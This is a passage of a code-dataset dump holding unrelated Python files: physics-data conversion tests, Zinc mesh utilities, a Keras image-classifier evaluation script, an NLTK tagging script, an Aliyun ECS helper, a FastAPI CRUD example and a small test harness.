test_df_to_pmaps_dict_negative_limit_takes_all_events(KrMC_pmaps):\n # Read all events\n negative_max_events = -23\n _, (s1s, s2s, s2sis), (S1_evts, S2_evts, _), _ = KrMC_pmaps\n s1dict = df_to_pmaps_dict(s1s, negative_max_events)\n s2dict = df_to_pmaps_dict(s2s, negative_max_events)\n assert sorted(list(s1dict.keys())) == S1_evts\n assert sorted(list(s2dict.keys())) == S2_evts\n\n\ndef test_df_to_pmaps_dict_arrays_lengths_are_equal(KrMC_pmaps):\n _, (_, s2s, _), (_, S2_evts, _), _ = KrMC_pmaps\n\n s2dict = df_to_pmaps_dict(s2s)\n for evt in s2dict.values():\n for peak in evt.values():\n assert len(peak.t) == len(peak.E)\n\n\ndef test_df_to_pmaps_dict_one_entry_per_event(s12_dataframe_converted):\n converted, original = s12_dataframe_converted\n number_of_events_in_original = len(set(original.event))\n assert len(converted) == number_of_events_in_original\n\n\ndef test_df_to_pmaps_dict_event_numbers_should_be_keys(s12_dataframe_converted):\n converted, original = s12_dataframe_converted\n event_numbers_in_original = set(original.event)\n for event_number in event_numbers_in_original:\n assert event_number in converted\n\n\ndef test_df_to_pmaps_dict_structure(s12_dataframe_converted):\n converted, _ = s12_dataframe_converted\n # Each event number is mapped to a subdict ...\n for event_no, subdict in converted.items():\n # in which peak numbers are mapped to a t,E pair ...\n for peak_no, peak_data in subdict.items():\n assert hasattr(peak_data, 't')\n assert hasattr(peak_data, 'E')\n for element in peak_data:\n assert type(element) is np.ndarray\n\n\ndef test_df_to_pmaps_dict_events_contain_peaks(s12_dataframe_converted):\n converted, _ = s12_dataframe_converted\n # Multiple peaks in one event ...\n # In event no 0, there are two peaks; evt 3 has one peak\n assert len(converted[0]) == 2\n assert len(converted[3]) == 1\n\n\ndef test_df_to_pmaps_dict_events_data_correct(s12_dataframe_converted):\n converted, original = s12_dataframe_converted\n\n all_peaks = [ converted[event][peak]\n for event in sorted(converted)\n for peak in sorted(converted[event])]\n\n converted_time = np.concatenate(list(map(itemgetter(0), all_peaks)))\n converted_ene = np.concatenate(list(map(itemgetter(1), all_peaks)))\n\n assert (converted_time == original.time).all()\n assert (converted_ene == original.ene ).all()\n\n\n###############################################################\n# df_to_s2si_dict-related tests\n###############################################################\ndef test_df_to_s2si_dict_limit_events(KrMC_pmaps):\n max_events = 30\n _, (_, _, s2sis), (_, _, S2Si_evts), _ = KrMC_pmaps\n S2Sidict = df_to_s2si_dict(s2sis, max_events)\n assert sorted(S2Sidict.keys()) == []\n\n\ndef test_df_to_s2si_dict_take_all_events_if_limit_too_high(KrMC_pmaps):\n max_events_is_more_than_available = 10000\n _, (_, _, s2sis), (_, _, S2Si_evts), _ = KrMC_pmaps\n S2Sidict = df_to_s2si_dict(s2sis, max_events_is_more_than_available)\n assert sorted(S2Sidict.keys()) == S2Si_evts\n\n\ndef test_df_to_s2si_dict_default_number_of_events(KrMC_pmaps):\n # Read all events\n _, (_, _, s2sis), (_, _, S2Si_evts), _ = KrMC_pmaps\n S2Sidict = df_to_s2si_dict(s2sis)\n assert sorted(S2Sidict.keys()) == S2Si_evts\n\n\ndef test_df_to_s2si_dict_negative_limit_takes_all_events(KrMC_pmaps):\n # Read all events\n negative_max_events = -23\n _, (_, _, s2sis), (_, _, S2Si_evts), _ = KrMC_pmaps\n S2Sidict = df_to_s2si_dict(s2sis, negative_max_events)\n assert sorted(S2Sidict.keys()) == S2Si_evts\n\n\ndef test_df_to_s2si_dict_number_of_slices_is_correct(KrMC_pmaps):\n _, (_, s2s, s2sis), (_, S2_evts, _), _ = KrMC_pmaps\n S2_energy = df_to_pmaps_dict( s2s)\n S2_tracking = df_to_s2si_dict (s2sis)\n\n event_numbers_seen_in_tracking_plane = set(S2_tracking)\n event_numbers_seen_in_energy_plane = set(S2_energy)\n\n common_event_numbers = set.intersection(event_numbers_seen_in_energy_plane,\n event_numbers_seen_in_tracking_plane)\n\n for event_no in common_event_numbers:\n tracking_peak_nos = set(S2_tracking[event_no])\n energy_peak_nos = set(S2_energy [event_no])\n\n for peak_no in set.intersection(energy_peak_nos, tracking_peak_nos):\n energy_peak = S2_energy [event_no][peak_no]\n tracking_peak = S2_tracking[event_no][peak_no]\n\n for sipm_no, tracking_peak_E in tracking_peak.items():\n assert len(energy_peak.E) == len(tracking_peak_E)\n\n\ndef test_df_to_s2si_dict_one_entry_per_event(s2si_dataframe_converted):\n converted, original = s2si_dataframe_converted\n number_of_events_in_original = len(set(original.event))\n assert len(converted) == number_of_events_in_original\n\n\ndef test_df_to_s2si_dict_event_numbers_should_be_keys(s2si_dataframe_converted):\n converted, original = s2si_dataframe_converted\n event_numbers_in_original = set(original.event)\n for event_number in event_numbers_in_original:\n assert event_number in converted\n\n\ndef test_df_to_s2si_dict_structure(s2si_dataframe_converted):\n converted, _ = s2si_dataframe_converted\n # Each event number is mapped to a subdict ...\n for event_no, subdict in converted.items():\n # in which peak numbers are mapped to a subdict ...\n for peak_no, peak_data in subdict.items():\n # in which SiPMs IDs are mapped to a t, E pair\n for sipm_no, sipm in peak_data.items():\n assert type(sipm) is np.ndarray\n\n\ndef test_df_to_s2si_dict_events_contain_peaks(s2si_dataframe_converted):\n converted, _ = s2si_dataframe_converted\n # Multiple peaks in one event ...\n # In event no 0, there are two peaks; evt 3 has one peak\n assert len(converted[0]) == 2\n assert len(converted[3]) == 1\n\n\ndef test_df_to_s2si_dict_events_data_correct(s2si_dataframe_converted):\n converted, original = s2si_dataframe_converted\n\n all_sipms = [ (sipm[0], sipm[1])\n for event in sorted(converted)\n for peak in sorted(converted[event])\n for sipm in sorted(converted[event][peak].items()) ]\n\n converted_sipm = np.array (list(map(itemgetter(0), all_sipms)))\n converted_ene = np.concatenate(list(map(itemgetter(1), all_sipms)))\n\n assert (converted_sipm == original.nsipm).all()\n assert (converted_ene[np.nonzero(converted_ene)] == original.ene ).all()\n","sub_path":"invisible_cities/reco/pmaps_functions_test.py","file_name":"pmaps_functions_test.py","file_ext":"py","file_size_in_byte":9468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"512590895","text":"'''\nUtility functions for easing use of Zinc API.\nCreated on Jan 4, 2018\n\n@author: Richard Christie\n'''\n\nfrom opencmiss.zinc.field import Field\nfrom opencmiss.zinc.node import Node\nfrom scaffoldmaker.utils.interpolation import *\nimport scaffoldmaker.utils.vector as vector\n\ndef getOrCreateCoordinateField(fieldmodule, name='coordinates', componentsCount=3):\n '''\n Finds or creates a rectangular cartesian coordinate field.\n New field has component names, 'x', 'y', 'z'.\n Raises exception if existing field of name is not finite element type or has incorrect attributes.\n :param fieldmodule: Zinc fieldmodule to find or create field in.\n :param name: Name of field to find or create.\n :param componentsCount: Number of components / dimension of field.\n '''\n assert (componentsCount > 0) and (componentsCount <= 3), 'getOrCreateCoordinateField. Dimensions must be from 1 to 3'\n coordinates = fieldmodule.findFieldByName(name)\n if coordinates.isValid():\n coordinates = coordinates.castFiniteElement()\n assert coordinates.isValid(), 'getOrCreateCoordinateField. Existing field \\'' + name + '\\' is not finite element type'\n assert coordinates.getNumberOfComponents() == componentsCount, 'getOrCreateCoordinateField. Existing field \\'' + name + '\\' does not have ' + str(componentsCount) + ' components'\n assert coordinates.getCoordinateSystemType() == Field.COORDINATE_SYSTEM_TYPE_RECTANGULAR_CARTESIAN, 'getOrCreateCoordinateField. Existing field \\'' + name + '\\' is not rectangular Cartesian'\n return coordinates\n fieldmodule.beginChange()\n coordinates = fieldmodule.createFieldFiniteElement(componentsCount)\n coordinates.setName(name)\n coordinates.setManaged(True)\n coordinates.setTypeCoordinate(True)\n coordinates.setCoordinateSystemType(Field.COORDINATE_SYSTEM_TYPE_RECTANGULAR_CARTESIAN)\n for c in range(componentsCount):\n coordinates.setComponentName(c + 1, ['x', 'y', 'z'][c])\n fieldmodule.endChange()\n return coordinates\n\ndef getOrCreateElementXiField(fieldmodule, name='element_xi', mesh=None):\n '''\n Finds or creates a stored mesh location field for storing locations in the\n supplied mesh e.g. for defining on annotation points with mesh locations.\n Raises exception if existing field of name is not stored mesh location type.\n Note can't currently verify existing field stores locations in the supplied mesh.\n :param fieldmodule: Zinc fieldmodule to find or create field in.\n :param name: Name of field to find or create.\n :param mesh: Mesh to store locations in.\n '''\n if mesh is None:\n mesh = fieldmodule.findMeshByDimension(3)\n assert mesh.isValid(), 'getOrCreateElementXiField. Invalid mesh'\n elementXiField = fieldmodule.findFieldByName(name)\n if elementXiField.isValid():\n elementXiField = elementXiField.castStoredMeshLocation()\n assert elementXiField.isValid(), 'getOrCreateElementXiField. Existing field \\'' + name + '\\' is not stored mesh location type'\n return elementXiField\n fieldmodule.beginChange()\n elementXiField = fieldmodule.createFieldStoredMeshLocation(mesh)\n elementXiField.setName(name)\n elementXiField.setManaged(True)\n fieldmodule.endChange()\n return elementXiField\n\ndef getOrCreateLabelField(fieldmodule, name='label'):\n '''\n Finds or creates a stored string field for defining labels on nodes, e.g. annotation points.\n Raises exception if existing field of name is not string-valued.\n Note can't currently distinguish stored string from constant string fields.\n :param fieldmodule: Zinc fieldmodule to find or create field in.\n :param name: Name of field to find or create.\n '''\n labelField = fieldmodule.findFieldByName(name)\n if labelField.isValid():\n assert labelField.getValueType() == Field.VALUE_TYPE_STRING, 'getOrCreateLabelField. Existing field \\'' + name + '\\' is not string valued'\n return labelField\n fieldmodule.beginChange()\n labelField = fieldmodule.createFieldStoredString()\n labelField.setName(name)\n labelField.setManaged(True)\n fieldmodule.endChange()\n return labelField\n\ndef getElementNodeIdentifiers(element, eft):\n '''\n Get identifiers of all nodes used by eft in element.\n '''\n nodeIdentifiers = []\n nodeCount = eft.getNumberOfLocalNodes()\n for n in range(nodeCount):\n node = element.getNode(eft, n + 1)\n nodeIdentifiers.append(node.getIdentifier())\n return nodeIdentifiers\n\ndef getElementNodeIdentifiers4Node(element, eft):\n '''\n Get 4 node identifiers for an element with 4 basis nodes, handling\n collapses e.g. where eft has fewer nodes. Asserts basis has 4 nodes.\n :param element: Element to query.\n :param eft: Element field template nodes are stored for in element.\n :return: List of 4 local node identifiers.\n '''\n elementbasis = eft.getElementbasis()\n basisNodesCount = elementbasis.getNumberOfNodes()\n assert basisNodesCount == 4, 'getElementNodeIdentifiers4Node: Element ' + str(element.getIdentifier()) + ' is not using a 4 node basis'\n nodeIdentifiers = []\n fn = 1\n for n in range(basisNodesCount):\n ln = eft.getTermLocalNodeIndex(fn, 1)\n nodeIdentifiers.append(element.getNode(eft, ln).getIdentifier())\n fn += elementbasis.getNumberOfFunctionsPerNode(n + 1)\n return nodeIdentifiers\n\ndef getElementNodeIdentifiers8Node(element, eft):\n '''\n Get 8 node identifiers for an element with 8 basis nodes, handling\n collapses e.g. where eft has fewer nodes. Asserts basis has 8 nodes.\n :param element: Element to query.\n :param eft: Element field template nodes are stored for in element.\n :return: List of 8 local node identifiers.\n '''\n elementbasis = eft.getElementbasis()\n basisNodesCount = elementbasis.getNumberOfNodes()\n assert basisNodesCount == 8, 'getElementNodeIdentifiers8Node: Element ' + str(element.getIdentifier()) + ' is not using an 8 node basis'\n nodeIdentifiers = []\n fn = 1\n for n in range(basisNodesCount):\n ln = eft.getTermLocalNodeIndex(fn, 1)\n nodeIdentifiers.append(element.getNode(eft, ln).getIdentifier())\n fn += elementbasis.getNumberOfFunctionsPerNode(n + 1)\n return nodeIdentifiers\n\ndef getMaximumNodeIdentifier(nodeset):\n \"\"\"\n :return: Maximum node identifier in nodeset or -1 if none.\n \"\"\"\n maximumNodeId = -1\n nodeiterator = nodeset.createNodeiterator()\n node = nodeiterator.next()\n while node.isValid():\n id = node.getIdentifier()\n if id > maximumNodeId:\n maximumNodeId = id\n node = nodeiterator.next()\n return maximumNodeId\n\ndef getMaximumElementIdentifier(mesh):\n \"\"\"\n :return: Maximum element identifier in mesh or -1 if none.\n \"\"\"\n maximumElementId = -1\n elementiterator = mesh.createElementiterator()\n element = elementiterator.next()\n while element.isValid():\n id = element.getIdentifier()\n if id > maximumElementId:\n maximumElementId = id\n element = elementiterator.next()\n return maximumElementId\n\ndef interpolateNodesCubicHermite(cache, coordinates, xi, normal_scale, \\\n node1, derivative1, scale1, cross_derivative1, cross_scale1, \\\n node2, derivative2, scale2, cross_derivative2, cross_scale2):\n \"\"\"\n Interpolates position and first derivative with cubic Hermite basis.\n Interpolates cross derivative linearly.\n :param cache: Field cache to evaluate in.\n :param coordinates: Coordinates field.\n :param xi: Element coordinate to interpolate at.\n :param normal_scale: Magnitude of normal derivative to return.\n :param node1, node2: Start and end nodes.\n :param derivative1, derivative2: Node value label for derivatives.\n :param scale1, scale2: Real value scaling derivatives, to reverse if needed.\n :param cross_derivative1, cross_derivative2: Node value label for cross derivatives.\n :param cross_scale1, cross_scale2: Real value scaling cross_derivatives, to reverse if needed.\n :return: x, dx_ds, dx_ds_cross, dx_ds_normal\n \"\"\"\n cache.setNode(node1)\n result, v1 = coordinates.getNodeParameters(cache, -1, Node.VALUE_LABEL_VALUE, 1, 3 )\n result, d1 = coordinates.getNodeParameters(cache, -1, derivative1, 1, 3 )\n result, d1c = coordinates.getNodeParameters(cache, -1, cross_derivative1, 1, 3 )\n d1 = [ scale1*d for d in d1 ]\n d1c = [ cross_scale1*d for d in d1c ]\n cache.setNode(node2)\n result, v2 = coordinates.getNodeParameters(cache, -1, Node.VALUE_LABEL_VALUE, 1, 3 )\n result, d2 = coordinates.getNodeParameters(cache, -1, derivative2, 1, 3 )\n result, d2c = coordinates.getNodeParameters(cache, -1, cross_derivative2, 1, 3 )\n d2 = [ scale2*d for d in d2 ]\n d2c = [ cross_scale2*d for d in d2c ]\n\n arcLength = computeCubicHermiteArcLength(v1, d1, v2, d2, True)\n mag = arcLength/vector.magnitude(d1)\n d1 = [ mag*d for d in d1 ]\n mag = arcLength/vector.magnitude(d2)\n d2 = [ mag*d for d in d2 ]\n\n xr = 1.0 - xi\n x = interpolateCubicHermite(v1, d1, v2, d2, xi)\n dx_ds = interpolateCubicHermiteDerivative(v1, d1, v2, d2, xi)\n scale = min(xi, xr)\n dx_ds = [ scale*d for d in dx_ds ]\n dx_ds_cross = [ (xr*d1c[c] + xi*d2c[c]) for c in range(3) ]\n\n radialVector = vector.normalise(vector.crossproduct3(dx_ds_cross, dx_ds))\n dx_ds_normal = [ normal_scale*d for d in radialVector ]\n\n return x, dx_ds, dx_ds_cross, dx_ds_normal\n\ndef computeNodeDerivativeHermiteLagrange(cache, coordinates, node1, derivative1, scale1, node2, scale2):\n \"\"\"\n Computes the derivative at node2 from quadratic Hermite-Lagrange interpolation of\n node1 value and derivative1 to node2 value.\n :param cache: Field cache to evaluate in.\n :param coordinates: Coordinates field.\n :param node1, node2: Start and end nodes.\n :param derivative1: Node value label for derivative at node1.\n :param scale1, scale2: Scaling to apply to derivatives at nodes, e.g. -1.0 to reverse.\n :return: dx_dxi at node2\n \"\"\"\n cache.setNode(node1)\n result, v1 = coordinates.getNodeParameters(cache, -1, Node.VALUE_LABEL_VALUE, 1, 3 )\n result, d1 = coordinates.getNodeParameters(cache, -1, derivative1, 1, 3 )\n d1 = [ d*scale1 for d in d1 ]\n cache.setNode(node2)\n result, v2 = coordinates.getNodeParameters(cache, -1, Node.VALUE_LABEL_VALUE, 1, 3 )\n d2 = interpolateHermiteLagrangeDerivative(v1, d1, v2, 1.0)\n d2 = [ d*scale2 for d in d2 ]\n return d2\n","sub_path":"scaffoldmaker/utils/zinc_utils.py","file_name":"zinc_utils.py","file_ext":"py","file_size_in_byte":10526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"167618613","text":"\nfrom PIL import Image\nimport numpy as np\nimport cv2\nimport os\nfrom sklearn.model_selection import train_test_split\n#import tensorflow as tf\n#import keras\n#from keras import backend as K\n#from keras.callbacks import ModelCheckpoint\n#from keras.preprocessing.image import ImageDataGenerator, array_to_img, img_to_array, load_img\n#from keras.backend.tensorflow_backend import set_session\n\n\nfrom tensorflow.python.keras.preprocessing import image\nfrom tensorflow.python.keras.models import Model,load_model\nfrom tensorflow.python.keras.callbacks import ModelCheckpoint\nfrom tensorflow.python.keras.layers import Dense, GlobalAveragePooling2D\nfrom tensorflow.python.keras.preprocessing.image import ImageDataGenerator\nfrom tensorflow.python.keras.optimizers import SGD, Adam\n\n\nfrom model import *\n\ndef load_image(image_fname):\n img = Image.open(image_fname)\n img = img.resize((299, 299))\n imgarray = np.array(img)/255.0\n #imgarray = np.array(img)\n final = np.expand_dims(imgarray, axis = 0)\n return final\n\n\n#if __name__ == \"__main__\":\ndef main(args):\n\n# config = tf.ConfigProto()\n# config.gpu_options.allow_growth = True\n# set_session(tf.Session(config=config))\n\n\n #if os.path.exists(model_file):\n if os.path.exists(args.model_path):\n print (\"\\n*******existing model found at {}\".format(args.model_path))\n model = load_existing(args.model_path)\n #model = create_model(200, 4)\n #model.load_weights(args.model_path)\n \n else:\n print (\"\\n***creating a new model****\\n\")\n model = create_model(num_hidden,num_classes)\n\n #model = inception_v4.create_model(num_classes=4, finetune=False)\n #model.load_weights(args.model_path)\n\n cls2idx = {'MaineCoon': 0, 'Ocelot': 1, 'Singapura': 2, 'TurkishVan': 3}\n idx2cls = [k for k,v in sorted(cls2idx.items(), key=lambda x:x[1])]\n\n for dirname, sub_dirnames, filenames in os.walk(args.val_path):\n if not dirname.endswith(args.val_path.split('/')[-1]):\n idx = cls2idx[ dirname.split('/')[-1] ]\n print('Current Directory:', dirname)\n for filename in filenames:\n path = os.path.join(dirname, filename)\n #img = get_processed_image(path)\n img = load_image(path)\n y_pred = model.predict(img)\n print(idx2cls[np.argmax(y_pred[0])], '||', y_pred)\n\n\n\n #val_path = '/home/s/sws007/dataset/test_final'\n\n target_size = (299, 299)\n #val_gen = ImageDataGenerator(rescale=1./255).flow_from_directory(images_dir, target_size=target_size, batch_size=args.batch_size, class_mode='categorical', shuffle=True)\n val_gen = ImageDataGenerator(rescale=1./255).flow_from_directory(args.val_path, target_size=target_size, batch_size=args.batch_size, class_mode='categorical', shuffle=True)\n\n learning_rate=1e-3\n model.compile(loss='categorical_crossentropy', optimizer=Adam(lr=learning_rate, decay=1e-3), metrics=['accuracy'])\n\n\n step_size_valid = val_gen.n // val_gen.batch_size\n print(model.evaluate_generator(val_gen, steps=step_size_valid, verbose=1))\n\nif __name__ == '__main__':\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('--model_path', type=str, required=True)\n parser.add_argument('--batch_size', type=int, default=16)\n parser.add_argument('--val_path', type=str, required=True)\n args = parser.parse_args()\n main(args)\n\n","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":3420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"77984563","text":"from nltk.corpus import stopwords\nfrom nltk import FreqDist\nimport nltk\nfrom collections import defaultdict\nimport csv\nimport re\nimport sys\n\ndf = open('./data/test.csv')\n\ndef clear(context):\n letters = re.sub(\"[^a-zA-Z]\", \" \", context)\n context = letters.lower().split()\n stopword = set(stopwords.words('english'))\n clear = [c for c in context if c not in stopword]\n return clear\n\ndef remove_html(context):\n cleaner = re.compile('<.*?>')\n clean_text = re.sub(cleaner,'',context)\n return clean_text\n\ndef pick_frequent(context):\n freq = FreqDist(context)\n return freq\n\nExtra_wordpool = ['p','via','two','make','e','c','using','r','three', 'mu', 'eta', 'must', 'r', 'm', 'v']\n\nreader = csv.DictReader(df)\noutput = open(sys.argv[1],'w')\nwriter=csv.writer(output)\nwriter.writerow(['id','tags'])\n\nfor idx,row in enumerate(reader):\n title = clear(row['title'])\n content = remove_html(row['content'])\n content = clear(content)\n ft = pick_frequent(title)\n fc = pick_frequent(content)\n common = set(fc).intersection(ft)\n temp = []\n if len(common) == 0:\n for t in title:\n if t not in Extra_wordpool:\n temp.append(t)\n writer.writerow([row['id'],' '.join(temp)])\n else:\n writer.writerow([row['id'],' '.join(common)])\n","sub_path":"final/src/fff.py","file_name":"fff.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"500659718","text":"from aliyunsdkcore.client import AcsClient\nfrom aliyunsdkcore.acs_exception.exceptions import ClientException\nfrom aliyunsdkcore.acs_exception.exceptions import ServerException\nfrom aliyunsdkecs.request.v20140526.DescribeInstancesRequest import DescribeInstancesRequest\nfrom aliyunsdkecs.request.v20140526.DescribeImagesRequest import DescribeImagesRequest\nfrom aliyunsdkecs.request.v20140526.DescribeRegionsRequest import DescribeRegionsRequest\nfrom aliyunsdkecs.request.v20140526.DescribeZonesRequest import DescribeZonesRequest\nfrom aliyunsdkecs.request.v20140526.CreateInstanceRequest import CreateInstanceRequest\nfrom aliyunsdkecs.request.v20140526.StopInstanceRequest import StopInstanceRequest\nfrom aliyunsdkecs.request.v20140526.DeleteInstanceRequest import DeleteInstanceRequest\nfrom aliyunsdkecs.request.v20140526.StartInstanceRequest import StartInstanceRequest\nfrom aliyunsdkecs.request.v20140526.DescribeInstanceStatusRequest import DescribeInstanceStatusRequest\nfrom aliyunsdkecs.request.v20140526.DescribeNetworkInterfacesRequest import DescribeNetworkInterfacesRequest\nfrom aliyunsdkecs.request.v20140526.RebootInstanceRequest import RebootInstanceRequest\nfrom aliyunsdkecs.request.v20140526.DescribeInstanceAttributeRequest import DescribeInstanceAttributeRequest\nfrom aliyunsdkecs.request.v20140526.CreateSecurityGroupRequest import CreateSecurityGroupRequest\nfrom aliyunsdkecs.request.v20140526.AllocatePublicIpAddressRequest import AllocatePublicIpAddressRequest\nimport json, time, socket\n\nparam1, param2 = \"\", \"\"\n\nclient = AcsClient(param1, param2, 'cn-beijing')\n\ndef setRegion(region):\n global client\n client = AcsClient(param1, param2, region)\n\ndef getImages():\n request = DescribeImagesRequest()\n request.set_accept_format('json')\n response = client.do_action_with_exception(request)\n response = json.loads(str(response, encoding='utf-8'))\n\n return response\n\ndef allocatePublicIpAddress(InstanceId):\n request = AllocatePublicIpAddressRequest()\n request.set_accept_format('json')\n request.set_InstanceId(InstanceId)\n response = client.do_action_with_exception(request)\n response = json.loads(str(response, encoding='utf-8'))\n return response\n\n# print(json.dumps(getImages()[\"Images\"][\"Image\"], indent=4))\n\ndef createInstance(params):\n request = CreateInstanceRequest()\n request.set_accept_format('json')\n \n if \"SecurityGroupId\" in params:\n request.set_SecurityGroupId(params[\"SecurityGroupId\"])\n if \"ZoneId\" in params:\n request.set_ZoneId(params[\"ZoneId\"])\n if \"VSwitchId\" in params:\n request.set_VSwitchId(params[\"VSwitchId\"])\n\n request.set_ImageId(params[\"ImageId\"])\n request.set_InstanceType(params[\"InstanceType\"])\n \n request.set_InstanceName(params[\"InstanceName\"])\n request.set_InternetChargeType(params[\"InternetChargeType\"])\n request.set_AutoRenew(params[\"AutoRenew\"])\n request.set_InternetMaxBandwidthOut(params[\"InternetMaxBandwidthOut\"])\n request.set_Password(params[\"Password\"])\n \n request.set_SystemDiskSize(params[\"SystemDiskSize\"])\n request.set_SystemDiskCategory(params[\"SystemDiskCategory\"])\n \n request.set_IoOptimized(params[\"IoOptimized\"])\n request.set_InstanceChargeType(params[\"InstanceChargeType\"])\n\n response = client.do_action_with_exception(request)\n response = json.loads(str(response, encoding='utf-8'))\n\n return response[\"InstanceId\"]\n\ndef createSecurityGroup():\n request = CreateSecurityGroupRequest()\n request.set_accept_format('json')\n response = client.do_action_with_exception(request)\n response = json.loads(str(response, encoding='utf-8'))\n return response\n\ndef startInstance(InstanceId):\n request = StartInstanceRequest()\n request.set_accept_format('json')\n request.set_InstanceId(InstanceId)\n response = client.do_action_with_exception(request)\n response = json.loads(str(response, encoding='utf-8'))\n return response\n\ndef stopInstance(InstanceId):\n request = StopInstanceRequest()\n request.set_accept_format('json')\n request.set_InstanceId(InstanceId)\n response = client.do_action_with_exception(request)\n response = json.loads(str(response, encoding='utf-8'))\n return response\n\ndef rebootInstance(InstanceId):\n request = RebootInstanceRequest()\n request.set_accept_format('json')\n request.set_InstanceId(InstanceId)\n response = client.do_action_with_exception(request)\n response = json.loads(str(response, encoding='utf-8'))\n return response\n\ndef deleteInstance(InstanceId):\n request = DeleteInstanceRequest()\n request.set_accept_format('json')\n request.set_InstanceId(InstanceId)\n response = client.do_action_with_exception(request)\n response = json.loads(str(response, encoding='utf-8'))\n return response\n\ndef getInstanceStatus(InstanceId):\n request = DescribeInstanceStatusRequest()\n request.set_accept_format('json')\n response = client.do_action_with_exception(request)\n response = json.loads(str(response, encoding='utf-8'))\n\n for entry in response[\"InstanceStatuses\"][\"InstanceStatus\"]:\n if entry[\"InstanceId\"] == InstanceId:\n return entry[\"Status\"]\n\n return None\n\ndef getInstanceAttribute(InstanceId):\n request = DescribeInstanceAttributeRequest()\n request.set_accept_format('json')\n request.set_InstanceId(InstanceId)\n response = client.do_action_with_exception(request)\n response = json.loads(str(response, encoding='utf-8'))\n return response\n\ndef getInstancePrivateIp(InstanceId):\n request = DescribeNetworkInterfacesRequest()\n request.set_accept_format('json')\n response = client.do_action_with_exception(request)\n response = json.loads(str(response, encoding='utf-8'))\n\n for entry in response[\"NetworkInterfaceSets\"][\"NetworkInterfaceSet\"]:\n if entry[\"InstanceId\"] == InstanceId:\n return entry[\"PrivateIpSets\"][\"PrivateIpSet\"][0][\"PrivateIpAddress\"]\n \n return None\n\ndef getInstanceIdByPrivateIpAddress(PrivateIpAddress):\n request = DescribeNetworkInterfacesRequest()\n request.set_accept_format('json')\n response = client.do_action_with_exception(request)\n response = json.loads(str(response, encoding='utf-8'))\n\n for entry in response[\"NetworkInterfaceSets\"][\"NetworkInterfaceSet\"]:\n if entry[\"PrivateIpSets\"][\"PrivateIpSet\"][0][\"PrivateIpAddress\"] == PrivateIpAddress:\n return entry[\"InstanceId\"]\n \n return None\n\ndef waitInstanceStatus(InstanceId, targetStatus, interval):\n while True:\n cur = getInstanceStatus(InstanceId)\n # print(cur)\n if cur == targetStatus:\n return\n time.sleep(interval)","sub_path":"cloudhelper_aliyun.py","file_name":"cloudhelper_aliyun.py","file_ext":"py","file_size_in_byte":6656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"41499868","text":"\n'''\nMethods\n'''\n\n'''\nclass object\n'''\n\nclass student:\n Name = \"\"\n ID = \"\"\n GPA = \"\"\n\n def set_value(self,Name,ID,GPA):\n self.Name = Name\n self.ID = ID\n self.GPA = GPA\n\n def dispalay(self):\n print(f\"Name : {self.Name} ID : {self.ID} GPA : {self.GPA} \");\n\nstu1 = student()\nName = input(\"Enter Your Name : \")\nID = input(\"Enter Your Student ID : \")\nGPA = input(\"Enter Your GPA : \")\n\nstu1.set_value(Name,ID,GPA)\nstu1.dispalay()\n\n\n\n\n\n\n\n","sub_path":"program_37 (Methods).py","file_name":"program_37 (Methods).py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"394366231","text":"import databases\nimport sqlalchemy\n\nfrom pydantic import BaseModel\nfrom fastapi import FastAPI\nfrom fastapi_crudrouter import DatabasesCRUDRouter\n\nDATABASE_URL = \"sqlite:///./test.db\"\n\ndatabase = databases.Database(DATABASE_URL)\nengine = sqlalchemy.create_engine(\n DATABASE_URL,\n connect_args={\"check_same_thread\": False}\n)\n\nmetadata = sqlalchemy.MetaData()\npotatoes = sqlalchemy.Table(\n \"potatoes\",\n metadata,\n sqlalchemy.Column(\"id\", sqlalchemy.Integer, primary_key=True),\n sqlalchemy.Column(\"thickness\", sqlalchemy.Float),\n sqlalchemy.Column(\"mass\", sqlalchemy.Float),\n sqlalchemy.Column(\"color\", sqlalchemy.String),\n sqlalchemy.Column(\"type\", sqlalchemy.String),\n)\nmetadata.create_all(bind=engine)\n\n\nclass PotatoCreate(BaseModel):\n thickness: float\n mass: float\n color: str\n type: str\n\n\nclass Potato(PotatoCreate):\n id: int\n\n\napp = FastAPI()\n\n\n@app.on_event(\"startup\")\nasync def startup():\n await database.connect()\n\n\n@app.on_event(\"shutdown\")\nasync def shutdown():\n await database.disconnect()\n\n\nrouter = DatabasesCRUDRouter(\n schema=Potato,\n create_schema=PotatoCreate,\n table=potatoes,\n database=database\n)\napp.include_router(router)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"553587775","text":"#!/usr/bin/env python3\n\"\"\"Module documentation goes here\n\"\"\"\n\nimport string\nimport subprocess\nimport sys\n\nclass TestDecomposer:\n \"\"\"Q & D class to test a student app.\n \"\"\"\n def __init__(self, test_no):\n self._app = \"./base-decomposer\"\n self._test_no = test_no\n self._input = [\"12345\", \"-12345\"]\n self._expected = [\n \"10000 + 2000 + 300 + 40 + 5\",\n \"-(10000 + 2000 + 300 + 40 + 5)\"]\n\n self.test()\n\n\n def test(self):\n \"\"\"Method is called by constructor. It is public, but should not need be\n called explicitly.\n \"\"\"\n returncode, actual = self._run()\n actual = \"\".join(filter(lambda x: x in string.printable, actual))\n\n if returncode != 0:\n print(\n \"ERROR: EXPECTED return 0, ACTUAL return {}\".format(returncode),\n file=sys.stderr)\n\n if not actual:\n print(\"ERROR: No output from student app.\", file=sys.stderr)\n sys.exit(1)\n\n print(\"STUDENT OUTPUT\")\n print(\"\\t----------------------------------\")\n print(\"\\t {}\".format(actual))\n print(\"\\t----------------------------------\")\n\n if actual == self._expected[self._test_no]:\n print(\"CORRECT!\")\n else:\n print(\"INCORRECT...\")\n print(\" Expected:\\t{}\".format(self._expected[self._test_no]))\n print(\" Actual:\\t{}\".format(actual))\n 